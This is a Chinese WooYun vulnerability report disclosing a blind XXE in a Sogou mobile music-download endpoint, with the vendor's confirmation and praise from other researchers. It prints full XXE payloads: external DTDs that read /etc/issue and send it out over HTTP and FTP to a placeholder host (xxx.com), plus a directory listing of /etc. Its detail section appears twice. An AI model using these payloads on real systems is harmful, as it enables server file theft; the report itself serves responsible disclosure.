当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0210560

漏洞标题:搜狗某站文件读取/列目录(Java环境Blind XXE)

相关厂商:搜狗

漏洞作者: Vinc

提交时间:2016-05-19 16:20

修复时间:2016-07-07 20:10

公开时间:2016-07-07 20:10

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-19: 细节已通知厂商并且等待厂商处理中
2016-05-23: 厂商已经确认,细节仅向厂商公开
2016-06-02: 细节向核心白帽子及相关领域专家公开
2016-06-12: 细节向普通白帽子公开
2016-06-22: 细节向实习白帽子公开
2016-07-07: 细节向公众公开

简要描述:

rt

详细说明:

http://m.sogou.com/music/musicDownload.jsp?album=%E5%8F%A3%E9%9F%B3&clk=2&keyword=1&lyc=&lyricMatch=yes&p=1&qqdurl=http://cc.stream.qqmusic.qq.com/C100002T2WQy2NIgLS.m4a%3Ffromtag%3D52&s=%E7%AA%A6%E5%94%AF&singer=%E7%AA%A6%E5%94%AF&size=0&title=1&type=%E6%9C%AA%E7%9F%A5&uID=qE_VFO3qxwVsK7Gx&url=http://xxx.com/1&v=2&w=1111
其中参数url存在XXE风险,这里没有回显,先通过HTTP Accesslog验证一下。
1的文件内容如下:
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://xxx.com?xxoo">
%remote;
]>
</root>
然后看日志

123.png


只要我们服务器有接收到来源于解析服务器的请求,就证明存在XXE漏洞。
来直接读file内容,用到两个文件
文件1:
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://xxx.com/2">
%remote;
]>
</root>
文件2:
<!ENTITY % payload SYSTEM "file:///etc/issue">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://xxx.com/%payload;'>">
%int;
%trick;
不成功。有两种办法,通过gopher或者ftp。我们来用ftp试一下。
修改文件2的内容:
<!ENTITY % payload SYSTEM "file:///etc/issue">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'ftp://xxx.com/%payload;'>">
%int;
%trick;
然后抓包,用wireshark看看。可以看到读取到了/etc/issue文件。

123.png


然后试一下列目录。
用了这个帖子里的监听代码。http://zone.wooyun.org/content/26651
读取一下/etc/下的文件

123.png


漏洞证明:

http://m.sogou.com/music/musicDownload.jsp?album=%E5%8F%A3%E9%9F%B3&clk=2&keyword=1&lyc=&lyricMatch=yes&p=1&qqdurl=http://cc.stream.qqmusic.qq.com/C100002T2WQy2NIgLS.m4a%3Ffromtag%3D52&s=%E7%AA%A6%E5%94%AF&singer=%E7%AA%A6%E5%94%AF&size=0&title=1&type=%E6%9C%AA%E7%9F%A5&uID=qE_VFO3qxwVsK7Gx&url=http://xxx.com/1&v=2&w=1111
其中参数url存在XXE风险,这里没有回显,先通过HTTP Accesslog验证一下。
1的文件内容如下:
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://xxx.com?xxoo">
%remote;
]>
</root>
然后看日志

123.png


只要我们服务器有接收到来源于解析服务器的请求,就证明存在XXE漏洞。
来直接读file内容,用到两个文件
文件1:
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://xxx.com/2">
%remote;
]>
</root>
文件2:
<!ENTITY % payload SYSTEM "file:///etc/issue">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://xxx.com/%payload;'>">
%int;
%trick;
不成功。有两种办法,通过gopher或者ftp。我们来用ftp试一下。
修改文件2的内容:
<!ENTITY % payload SYSTEM "file:///etc/issue">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'ftp://xxx.com/%payload;'>">
%int;
%trick;
然后抓包,用wireshark看看。可以看到读取到了/etc/issue文件。

123.png


然后试一下列目录。
用了这个帖子里的监听代码。http://zone.wooyun.org/content/26651
读取一下/etc/下的文件

123.png


修复方案:

.

版权声明:转载请注明来源 Vinc@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-23 20:04

厂商回复:

感谢支持

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-19 16:22 | D&G ( 普通白帽子 | Rank:780 漏洞数:158 | going)

    赞~

  2. 2016-05-19 16:25 | Vinc ( 普通白帽子 | Rank:383 漏洞数:58 | 提莫队长正在待命!)

    忘了感谢我大付屌

  3. 2016-05-19 17:47 | sauce ( 普通白帽子 | Rank:300 漏洞数:47 | 面向人民币编程)

    666

  4. 2016-05-23 21:08 | menmen519 ( 普通白帽子 | Rank:982 漏洞数:167 | http://menmen519.blog.sohu.com/)

    收下我的膝盖

  5. 2016-06-13 08:55 | D&G ( 普通白帽子 | Rank:780 漏洞数:158 | going)

    这个漏洞不错

  6. 2016-06-17 19:46 | sauce ( 普通白帽子 | Rank:300 漏洞数:47 | 面向人民币编程)

    师傅厉害

  7. 2016-06-19 21:15 | Vinc ( 普通白帽子 | Rank:383 漏洞数:58 | 提莫队长正在待命!)

    @sauce 师傅好